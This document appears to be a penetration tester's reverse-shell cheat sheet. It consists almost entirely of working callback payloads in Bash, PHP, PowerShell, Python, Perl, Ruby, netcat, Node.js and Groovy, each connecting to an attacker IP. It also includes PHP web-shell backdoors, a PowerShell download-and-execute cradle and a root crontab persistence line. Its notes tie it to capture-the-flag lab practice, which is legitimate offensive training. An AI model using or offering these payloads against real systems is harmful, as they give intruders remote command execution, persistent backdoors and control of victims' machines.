Backlink: reference-notes-readme


Bash

bash -i >& /dev/tcp/10.10.14.18/443 0>&1

If we are running this from inside a sh shell, we may have to run it like this:

bash -i >& /dev/tcp/10.10.14.18/443 2>&1 &

PHP

Standard PHP Reverse Shell

$sock=fsockopen("10.10.14.18",443);exec("/bin/bash -i <&3 >&3 2>&3");

CLI One-Liner

This php shell opens a reverse connection back to our host, then executes '/bin/sh -i' with output redirected to file descriptor 3 (fd3).

php -r '$sock=fsockopen("10.10.14.18",443);exec("/bin/bash -i <&3 >&3 2>&3");'

Module One-Liner

The issue with the above php one-liner is that when the command is executed, fd3 may be the next available file descriptor, but it very well may not. The above command may work when php is being run from the CLI, but it doesn’t work if php is running as an Apache module or something. Instead of attaching to the file descriptor in the shell script, the solution is to do it from the php side, using a different function to execute the command.

Standard PHP

$sock = fsockopen("10.10.14.15",443);$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);

CLI One-Liner

php -r '$sock = fsockopen("10.10.14.15",443);$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);'

Using the above command, the shell will stay open even after the enclosing script finishes, so things like php max_execution_time aren't an issue at all. For more details, see penetration test - Reverse PHP shell disconnecting when netcat listener - Information Security Stack Exchange.

PHP Backdoor One-Liner

<?php echo system($_REQUEST['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>

PowerShell

Source Remote Script (Nishang)

Copy Nishang .ps1 script to working directory.

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1

Add the Invoke line to the end of the script file.

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.18 -Port 443' >> Invoke-PowerShellTcp.ps1

Start Python http server to host file.

python3 -m http.server 80
# or pytp alias

Use the following command on the target from a cmd.exe prompt to spawn PowerShell and download/execute the reverse shell script.

powershell -c "IEX(New-Object Net.webClient).downloadString('http://10.10.14.18/Invoke-PowerShellTcp.ps1')"

Apparently this execution command will also work to prevent the multiple quote issue. I had to use it to source through xp_cmdshell on mssql.

echo IEX(New-Object Net.webClient).DownloadString("http://10.1.1.246:8888/rev.ps1") | powershell -noprofile

Raw PowerShell Reverse Shell

From PowerShell Shell

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.11",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

From CMD Shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Escaped Version For Use in Commands Sent From Host Shell

\"\$client = New-Object System.Net.Sockets.TCPClient('10.10.14.16',4747);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\"

Python

Raw Python

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.18",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

One-Liner

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.18",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Perl

Raw Perl

use Socket;$i="10.10.14.36";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

One-Liner

perl -e 'use Socket;$i="10.10.14.36";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

Raw Ruby

f=TCPSocket.open("10.10.14.36",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

One-Liner

ruby -rsocket -e'f=TCPSocket.open("10.10.14.36",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Standard

nc -e /bin/sh 10.10.14.31 443

Non-Execute Versions

If the version of nc that allows passing a command to execute as an argument isn't installed, you may still be able to get a shell back by tricking nc with the following command.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -I 2>&1|nc 10.10.14.21 443 >/tmp/f

Scheduled Callback

We can schedule a reverse nc shell to spawn every minute by adding it to the cron file as root, if we have something that root is executing. For an example, see the box Fail in the OffSec Proving Grounds Practice section.

echo "*  *  *  *  * root nc 192.168.118.5 4444 -e /usr/bin/bash" >> /etc/crontab

JavaScript

(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4443, "192.168.49.205", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();

Groovy

String host = "192.168.45.5";
int port = 443;
String cmd = "/bin/sh";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0) so.write(pi.read());
while (pe.available() > 0) so.write(pe.read());
while (si.available() > 0) po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
   p.exitValue();
   break;
} catch (Exception e) {}
};
p.destroy();
s.close();